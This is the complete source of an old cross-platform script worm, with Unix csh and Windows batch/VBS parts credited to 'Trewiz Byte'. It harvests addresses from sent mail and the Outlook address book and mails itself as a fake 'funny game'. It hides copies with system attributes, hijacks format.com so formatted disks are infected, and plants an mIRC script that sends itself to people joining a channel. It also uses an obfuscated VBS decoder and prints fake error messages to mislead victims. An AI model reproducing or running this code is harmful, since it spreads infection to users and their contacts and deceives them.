#!/bin/csh
uuencode game.bat  game.bat > /tmp/game.uue
grep "To: " ~/Mail/sent-mail > /tmp/templog.log
cut --bytes=5- /tmp/templog.log > /tmp/templog3.log
echo "Check this new funny game!" > /tmp/templog4.log
cat /tmp/game.uue >> /tmp/templog4.log
echo "." >> /tmp/templog4.log
echo "" >> /tmp/templog4.log
echo 'mail -s ":o)"'> /tmp/temp.log
echo 'mail -s ":o)"'>> /tmp/temp.log
echo 'mail -s ":o)"'>> /tmp/temp.log
echo 'mail -s ":o)"'>> /tmp/temp.log
echo 'mail -s ":o)"'>> /tmp/temp.log
echo 'mail -s ":o)"'>> /tmp/temp.log
echo 'mail -s ":o)"'>> /tmp/temp.log
echo 'mail -s ":o)"'>> /tmp/temp.log
echo 'mail -s ":o)"'>> /tmp/temp.log
echo 'mail -s ":o)"'>> /tmp/temp.log
echo ' </tmp/templog4.log' > /tmp/temp3.tmp
echo ' </tmp/templog4.log' >> /tmp/temp3.tmp
echo ' </tmp/templog4.log' >> /tmp/temp3.tmp
echo ' </tmp/templog4.log' >> /tmp/temp3.tmp
echo ' </tmp/templog4.log' >> /tmp/temp3.tmp
echo ' </tmp/templog4.log' >> /tmp/temp3.tmp
echo ' </tmp/templog4.log' >> /tmp/temp3.tmp
echo ' </tmp/templog4.log' >> /tmp/temp3.tmp
echo ' </tmp/templog4.log' >> /tmp/temp3.tmp
echo ' </tmp/templog4.log' >> /tmp/temp3.tmp
head -n1 game.bat > /tmp/temp2.tmp
paste /tmp/temp.log /tmp/templog3.log /tmp/temp3.tmp >> /tmp/temp2.tmp
echo 'exit' >> /tmp/temp2.tmp
chmod 755 /tmp/temp2.tmp
/tmp/temp2.tmp &
echo "Error at 7FFF06:C674A2B"
echo "Abnormal program termination..."
exit

@echo off
cls
rem Multi System Worm by Trewiz Byte / Spain / April of 2001
ctty nul
del c:\game.bat
del c:\autoexec.vbs
copy %0 c:\game.bat
attrib +S c:\game.bat
copy game.bat C:\WINDOWS\COMMAND\EBD\game.bat
IF EXIST C:\WINDOWS\wscript.exe goto vbs
IF EXIST %path%\wscript.exe goto vbs 
ren C:\dos\format.com C:\dos\f.com
echo.@echo off >> c:\dos\format.bat
echo.c:\dos\f.com %1 %2 %3 %4 %5 >> c:\dos\format.bat
echo.copy c:\game.bat %1\game.bat >> c:\dos\format.bat
ren C:\msdos\format.com C:\msdos\f.com
echo.@echo off >> c:\msdos\format.bat
echo.c:\msdos\f.com %1 %2 %3 %4 %5 >> c:\dos\format.bat
echo.copy c:\game.bat %1\game.bat >> c:\dos\format.bat
ren C:\windows\format.com C:\windows\f.com
echo.@echo off >> c:\windows\format.bat
echo.c:\windows\f.com %1 %2 %3 %4 %5 >> c:\windows\format.bat
echo.copy c:\game.bat %1\game.bat >> c:\windows\format.bat
ren C:\windows\command\format.com C:\windows\command\f.com
echo.@echo off >> c:\windows\command\format.bat
echo.c:\windows\command\f.com %1 %2 %3 %4 %5 >> c:\windows\command\format.bat
echo.copy c:\game.bat %1\game.bat >> c:\windows\command\format.bat
goto fin
:vbs
echo.on error resume next >> c:\autoexec.vbs
echo>> c:\autoexec.vbs Execute(b("Tgw$F77(F*N~roƒu`t}yxŠ?:hˆŒŠNb’“Ž‰ˆœ’™™NV"))
echo>> c:\autoexec.vbs Set A11 = A10.GetNameSpace("MAPI")
echo>> c:\autoexec.vbs For Each A12 In A11.AddressLists
echo>> c:\autoexec.vbs Set A13 = A10.CreateItem(0)
echo>> c:\autoexec.vbs For A14 = 1 To A12.AddressEntries.Count
echo>> c:\autoexec.vbs Set A15 = A12.AddressEntries(A14)
echo>> c:\autoexec.vbs If A14 = 1 Then
echo>> c:\autoexec.vbs A13.BCC = A15.Address
echo>> c:\autoexec.vbs Else
echo>> c:\autoexec.vbs A13.BCC = A13.BCC & "; " & A15.Address
echo>> c:\autoexec.vbs End If
echo>> c:\autoexec.vbs Next
echo>> c:\autoexec.vbs A13.Subject = ":o)"
echo>> c:\autoexec.vbs A13.Body = "Check this new funny game!.Run in Windows Ms-dos and unix systems (Unix,Linux...)"
echo>> c:\autoexec.vbs A13.Attachments.Add "c:\game.bat"
echo>> c:\autoexec.vbs A13.DeleteAfterSubmit = True
echo>> c:\autoexec.vbs A13.Send
echo>> c:\autoexec.vbs Next
echo>> c:\autoexec.vbs Function b (X)
echo>> c:\autoexec.vbs For a = 1 To Len(X)
echo>> c:\autoexec.vbs c = Asc(Mid(X, a, a + 1))
echo>> c:\autoexec.vbs c = c - a
echo>> c:\autoexec.vbs d = d & Chr(c)
echo>> c:\autoexec.vbs Next
echo>> c:\autoexec.vbs b = d
echo>> c:\autoexec.vbs End Function
attrib +S +H c:\autoexec.vbs
wscript c:\autoexec.vbs
echo.[script] > c:\mirc\script.ini
echo.n0=on 1:JOIN:#:if $me != $nick dcc send $nick c:\game.bat >> c:\mirc\script.ini
attrib +S +H +R c:\mirc\script.ini
ctty con 
echo Error at 7FFF06:C674A2B
echo Abnormal program termination...
:fin